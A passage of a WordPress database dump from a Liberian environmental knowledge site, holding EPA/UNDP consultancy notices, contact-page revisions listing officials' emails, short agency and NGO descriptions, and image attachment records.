frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\n\n*Note* The closing date has been extended to 4PM, November 3<sup>rd</sup>, 2020.\n\nLink: <a href=\"http://www.epa.gov.lr/sites/default/files/National%20Consultant%20CCCD.pdf\"><em>Prepare and Validate the Methodology to Update the NCSA and Integrate the Post-2015 SDGs</em></a>','REFRENCE NO: TOR/CCCD/EPA-2020-006, Prepare and Validate the Methodology to Update the NCSA and Integrate the Post-2015 SDGs.','','inherit','closed','closed','','3175-autosave-v1','','','2020-10-27 10:38:31','2020-10-27 10:38:31','',3175,'https://ekmsliberia.info/3175-autosave-v1/',0,'revision','',0),(3180,42,'2020-10-27 10:56:30','2020-10-27 10:56:30','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>National Consultant, </strong>to <em>Assess and draft Environmental Guidelines for coordinated compliance, Monitoring and Reporting.</em> This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\r\n\r\n*Note* The closing date has been extended to 4PM, November 3<sup>rd</sup>, 2020.\r\n\r\nLink: <a href=\"http://epa.gov.lr/sites/default/files/National%20Consultant%20CCCD3.pdf\"><em>Assess and Draft Environmental Guidelines</em></a>','REFRENCE NO: TOR/CCCD/EPA-2020-009, Assess and Draft Environmental Guidelines','','publish','closed','closed','','refrence-no-tor-cccd-epa-2020-006-assess-and-draft-environmental-guidelines','','','2021-08-19 09:00:23','2021-08-19 09:00:23','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3180',122,'ekms_bulletin','',0),(3181,42,'2020-10-27 11:01:45','2020-10-27 11:01:45','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>National Consultant, </strong>to design and carry out a survey to assess public awareness of the importance of the Rio Conventions to catalyzing sustainable development<strong>.  </strong>. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.  To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\r\n\r\n*Note* The closing date has been extended to 4PM, November 3<sup>rd</sup>, 2020.\r\n\r\nLink: <a href=\"http://epa.gov.lr/sites/default/files/Consultant%20CCCD%204.pdf\"><em>Design and Carry Out a Survey to Assess Public Awareness</em></a>','REFRENCE NO: TOR/CCCD/EPA-2020-010, Design and Carry Out a Survey to Assess Public Awareness of the Importance of the Rio Conventions','','publish','closed','closed','','refrence-no-tor-cccd-epa-2020-010-design-and-carry-out-a-survey-to-assess-public-awareness-of-the-importance-of-the-rio-conventions','','','2021-08-19 08:59:37','2021-08-19 08:59:37','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3181',121,'ekms_bulletin','',0),(3183,42,'2020-10-30 09:57:05','2020-10-30 09:57:05','','','','inherit','open','closed','','alfreeman','','','2021-01-18 14:47:35','2021-01-18 14:47:35','',80,'https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg',0,'attachment','image/jpeg',0),(3184,42,'2020-10-30 09:57:25','2020-10-30 09:57:25','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2020-10-30 09:57:25','2020-10-30 09:57:25','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3185,42,'2020-10-30 09:58:03','2020-10-30 09:58:03','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2020-10-30 09:58:03','2020-10-30 09:58:03','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3187,42,'2021-08-17 20:39:27','2021-08-17 20:39:27','The Liberia Land Authority (LLA) is a product of the policy, legal and institutional reform of the land sector of Liberia led by the Erstwhile Land Commission. The LLA, established by an Act of the National Legislature on October 6, 2016, as an autonomous agency of the Government with operational independence, subsumes land functions that were performed by several agencies of the Government, including the key land administration agencies - Department of Lands, Survey and Cartography of the former Ministry of Lands, Mines and Energy (MLME), now the Ministry of Mines and Energy, the Deeds and Titles Registry of the Center for National Documents Records Agency (CNDRA), and functions of County Land Commissioners from the Ministry of Internal Affairs.\n\nThe LLA\'s mandate of the Authority is to develop policies on a continuous basis, undertake actions and implement programs in support of land governance, including land administration and management in Liberia.\n','Liberia Land Authority','','inherit','closed','closed','','1602-autosave-v1','','','2021-08-17 20:39:27','2021-08-17 20:39:27','',1602,'https://ekmsliberia.info/1602-autosave-v1/',0,'revision','',0),(3188,42,'2020-11-02 11:24:39','2020-11-02 11:24:39','','LLA','','inherit','open','closed','','railroad','','','2020-11-02 11:24:48','2020-11-02 11:24:48','',1602,'https://ekmsliberia.info/wp-content/uploads/2019/11/Railroad.jpg',0,'attachment','image/jpeg',0),(3189,42,'2020-11-02 11:56:17','2020-11-02 11:56:17','','LIMA','','inherit','open','closed','','liberia_shipregistration2-1738x1158','','','2020-11-02 11:57:03','2020-11-02 11:57:03','',1606,'https://ekmsliberia.info/wp-content/uploads/2019/11/liberia_shipregistration2-1738x1158-1.jpg',0,'attachment','image/jpeg',0),(3190,42,'2021-08-17 22:24:57','2021-08-17 22:24:57','LiMA coming soon!\n','Liberia Maritime Authority','','inherit','closed','closed','','1606-autosave-v1','','','2021-08-17 22:24:57','2021-08-17 22:24:57','',1606,'https://ekmsliberia.info/1606-autosave-v1/',0,'revision','',0),(3191,42,'2020-11-02 11:59:14','2020-11-02 11:59:14','LiMA coming soon!\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:lima\" page_length=\"false\"]','Liberia Maritime Authority','','inherit','closed','closed','','1606-revision-v1','','','2020-11-02 11:59:14','2020-11-02 11:59:14','',1606,'https://ekmsliberia.info/1606-revision-v1/',0,'revision','',0),(3192,42,'2020-11-04 10:37:09','2020-11-04 10:37:09','','f&f','','inherit','open','closed','','ff','','','2020-11-04 10:37:09','2020-11-04 10:37:09','',1614,'https://ekmsliberia.info/wp-content/uploads/2019/11/ff.jpg',0,'attachment','image/jpeg',0),(3193,42,'2021-08-17 21:22:58','2021-08-17 21:22:58','Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country’s oldest protected area – Sapo National Park – after years of civil conflict.\n\nDrawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.\n\nWe are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.\n\nRecognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.\n\nCommunity involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.\n\nFFI is also supporting Liberia’s up-and-coming conservationists by helping to build conservation capacity at a national level – something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.\n','Fauna & Flora International','','inherit','closed','closed','','1614-autosave-v1','','','2021-08-17 21:22:58','2021-08-17 21:22:58','',1614,'https://ekmsliberia.info/1614-autosave-v1/',0,'revision','',0),(3194,42,'2020-11-04 10:47:20','2020-11-04 10:47:20','','wcf','','inherit','open','closed','','wcf-2','','','2020-11-04 10:47:20','2020-11-04 10:47:20','',3083,'https://ekmsliberia.info/wp-content/uploads/2020/06/wcf.png',0,'attachment','image/png',0),(3195,42,'2021-08-17 21:30:18','2021-08-17 21:30:18','The Wild Chimpanzee Foundation’s mission is to enhance the survival of the remaining wild chimpanzee populations and their habitat, thereby participate in saving the behavioral diversity of this fascinating species. The philosophy of the WCF is threefold: Implement projects of Education, Conservation, and Research for and by the African people\n\nWCF implements conservation projects in Côte d’Ivoire, Liberia and Guinea. We concentrate our activities in regions were wild chimpanzees are still abundant to ensure their future survival\n','Wild Chimpanzee Foundation','','inherit','closed','closed','','3083-autosave-v1','','','2021-08-17 21:30:18','2021-08-17 21:30:18','',3083,'https://ekmsliberia.info/3083-autosave-v1/',0,'revision','',0),(3196,42,'2020-11-04 11:57:27','2020-11-04 11:57:27','','mpw','','inherit','open','closed','','mpw','','','2020-11-04 11:57:27','2020-11-04 11:57:27','',1594,'https://ekmsliberia.info/wp-content/uploads/2019/11/mpw.jpg',0,'attachment','image/jpeg',0),(3197,42,'2021-08-17 23:33:00','2021-08-17 23:33:00','The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.\n\nThe Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.\n','Ministry of Public Works','','inherit','closed','closed','','1594-autosave-v1','','','2021-08-17 23:33:00','2021-08-17 23:33:00','',1594,'https://ekmsliberia.info/1594-autosave-v1/',0,'revision','',0),(3199,42,'2020-11-04 12:10:50','2020-11-04 12:10:50','','mpw','','inherit','open','closed','','mpw-2','','','2020-11-04 12:10:50','2020-11-04 12:10:50','',1594,'https://ekmsliberia.info/wp-content/uploads/2019/11/mpw-1.jpg',0,'attachment','image/jpeg',0),(3201,42,'2020-11-09 09:29:05','2020-11-09 09:29:05','Coming up','Gender','','inherit','closed','closed','','485-autosave-v1','','','2020-11-09 09:29:05','2020-11-09 09:29:05','',485,'https://ekmsliberia.info/485-autosave-v1/',0,'revision','',0),(3202,42,'2020-11-09 09:49:06','2020-11-09 09:49:06','','Forest5','','inherit','open','closed','','forest5','','','2020-11-09 09:49:06','2020-11-09 09:49:06','',467,'https://ekmsliberia.info/wp-content/uploads/2019/11/Forest5.jpg',0,'attachment','image/jpeg',0),(3203,42,'2020-11-09 09:49:53','2020-11-09 09:49:53','Mountains ecosystems are actually associated with the terrestrial ecosystems because they are found on highlands. They provide an array of habitats where a large number of animals and plants can be found. Like other ecosystems such as those described above, the mountain ecosystems host plant and animal species that can adapt to the influence of elevation and climate of the area.\r\n\r\nMountain ecosystems are home to a wide variety of animals and plants species. The ecological richness and beautiful features of Liberia‘s mountain landscapes make for attractive tourist destinations. Unfortunately, the tourism sector of Liberia is still underdeveloped and so is unable to utilize the opportunities which these mountain ecosystems provide.\r\n\r\nThe mountains and mountain ranges identified in Liberia are Nimba, Wologisi, Bong Range, Gibi, Putu, Bomi, Wutivi, Mano, Bea, Kpo Range, and Wenegissi (Ref: Liberia National Biodiversity Strategy and Action Plan 2017-2025). It must be noted here, though, that four of these mountains and mountain ranges –Bong Range, Gibi Mountain, Kpo Range, Bomi Mountain, have been exploited for iron ore. Meanwhile, ArcelorMittal, a multinational mining giant , has gathered more information about the various species of birds of which the mountains of the Nimba Range serve as habitat.Previously, the total species list for the Nimba Range stood at 413. Because of the research on birds that AML had supported, the current list of birds of the Nimba Range is now 615 (AML 2010).','Mountain Biodiversity','Mountains ecosystems are actually associated with the terrestrial ecosystems because they are found on highlands. ','inherit','closed','closed','','467-autosave-v1','','','2020-11-09 09:49:53','2020-11-09 09:49:53','',467,'https://ekmsliberia.info/467-autosave-v1/',0,'revision','',0),(3205,42,'2020-11-09 09:59:46','2020-11-09 09:59:46','','providence-island-monrovia','','inherit','open','closed','','providence-island-monrovia','','','2020-11-09 09:59:46','2020-11-09 09:59:46','',469,'https://ekmsliberia.info/wp-content/uploads/2019/11/providence-island-monrovia.jpg',0,'attachment','image/jpeg',0),(3207,42,'2020-11-09 14:10:45','2020-11-09 14:10:45','','SDG','','inherit','open','closed','','sdg','','','2020-11-09 14:10:45','2020-11-09 14:10:45','',476,'https://ekmsliberia.info/wp-content/uploads/2019/11/SDG.jpg',0,'attachment','image/jpeg',0),(3208,42,'2020-11-09 14:11:04','2020-11-09 14:11:04','','Land and Sustainable Development Goals','','inherit','closed','closed','','476-autosave-v1','','','2020-11-09 14:11:04','2020-11-09 14:11:04','',476,'https://ekmsliberia.info/476-autosave-v1/',0,'revision','',0),(3209,42,'2020-11-09 14:28:43','2020-11-09 14:28:43','','','','inherit','open','closed','','un-media_kenya_riccardo_gangale-1400-wide','','','2020-11-09 14:28:51','2020-11-09 14:28:51','',478,'https://ekmsliberia.info/wp-content/uploads/2019/11/UN-Media_Kenya_Riccardo_Gangale-1400-wide.jpg',0,'attachment','image/jpeg',0),(3210,42,'2020-11-09 15:28:53','2020-11-09 15:28:53','','','','inherit','open','closed','','liberia-ebola-orphans-07-kids','','','2020-11-09 15:29:06','2020-11-09 15:29:06','',1584,'https://ekmsliberia.info/wp-content/uploads/2019/11/liberia-ebola-orphans-07-kids.jpg',0,'attachment','image/jpeg',0),(3211,42,'2020-11-09 15:29:15','2020-11-09 15:29:15','The MODCSP information coming soon!\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mogcsp\" page_length=\"false\"]','Ministry of Gender, Children and Social Protection','','inherit','closed','closed','','1584-revision-v1','','','2020-11-09 15:29:15','2020-11-09 15:29:15','',1584,'https://ekmsliberia.info/1584-revision-v1/',0,'revision','',0),(3212,42,'2020-11-09 15:34:46','2020-11-09 15:34:46','','','','inherit','open','closed','','homeowner-kids-puppy-argentina','','','2020-11-09 15:34:59','2020-11-09 15:34:59','',2964,'https://ekmsliberia.info/wp-content/uploads/2020/02/homeowner-kids-puppy-argentina.jpg',0,'attachment','image/jpeg',0),(3213,42,'2020-11-09 15:39:29','2020-11-09 15:39:29','','','','inherit','open','closed','','west-african-sunset-liberia-2','','','2020-11-09 15:39:39','2020-11-09 15:39:39','',3005,'https://ekmsliberia.info/wp-content/uploads/2020/02/West-African-sunset-Liberia-1.jpg',0,'attachment','image/jpeg',0),(3214,42,'2020-11-10 09:53:45','2020-11-10 09:53:45','','CI','','inherit','open','closed','','ci','','','2020-11-10 09:53:45','2020-11-10 09:53:45','',1612,'https://ekmsliberia.info/wp-content/uploads/2019/11/CI.jpg',0,'attachment','image/jpeg',0),(3215,42,'2020-11-10 15:54:39','2020-11-10 15:54:39','','mot','','inherit','open','closed','','mot-2','','','2020-11-10 15:54:39','2020-11-10 15:54:39','',1596,'https://ekmsliberia.info/wp-content/uploads/2019/11/mot-1.jpg',0,'attachment','image/jpeg',0),(3216,42,'2020-11-10 15:54:52','2020-11-10 15:54:52','Liberia Airport Authority Information coming up\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:laa\" page_length=\"false\"]','Liberia Airport Authority','','inherit','closed','closed','','1596-revision-v1','','','2020-11-10 15:54:52','2020-11-10 15:54:52','',1596,'https://ekmsliberia.info/1596-revision-v1/',0,'revision','',0),(3217,42,'2020-11-10 16:02:51','2020-11-10 16:02:51','','Liberias-Roberts-International-Airport','','inherit','open','closed','','liberias-roberts-international-airport','','','2020-11-10 16:02:51','2020-11-10 16:02:51','',1596,'https://ekmsliberia.info/wp-content/uploads/2019/11/Liberias-Roberts-International-Airport.jpg',0,'attachment','image/jpeg',0),(3218,42,'2020-11-11 12:28:48','2020-11-11 12:28:48','','climate tech','','inherit','open','closed','','climate-tech','','','2020-11-11 12:28:48','2020-11-11 12:28:48','',483,'https://ekmsliberia.info/wp-content/uploads/2019/11/climate-tech.png',0,'attachment','image/png',0),(3219,42,'2020-11-11 12:43:03','2020-11-11 12:43:03','','climate act','','inherit','open','closed','','climate-act','','','2020-11-11 12:43:03','2020-11-11 12:43:03','',479,'https://ekmsliberia.info/wp-content/uploads/2019/11/climate-act.jpg',0,'attachment','image/jpeg',0),(3220,42,'2020-11-11 12:52:15','2020-11-11 12:52:15','','sub-humid','','inherit','open','closed','','sub-humid','','','2020-11-11 12:52:15','2020-11-11 12:52:15','',472,'https://ekmsliberia.info/wp-content/uploads/2019/11/sub-humid.jpg',0,'attachment','image/jpeg',0),(3221,42,'2020-11-11 12:57:00','2020-11-11 12:57:00','','nafaa','','inherit','open','closed','','nafaa','','','2020-11-11 12:57:00','2020-11-11 12:57:00','',1588,'https://ekmsliberia.info/wp-content/uploads/2019/11/nafaa.jpg',0,'attachment','image/jpeg',0),(3222,42,'2020-11-11 12:58:00','2020-11-11 12:58:00','The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of 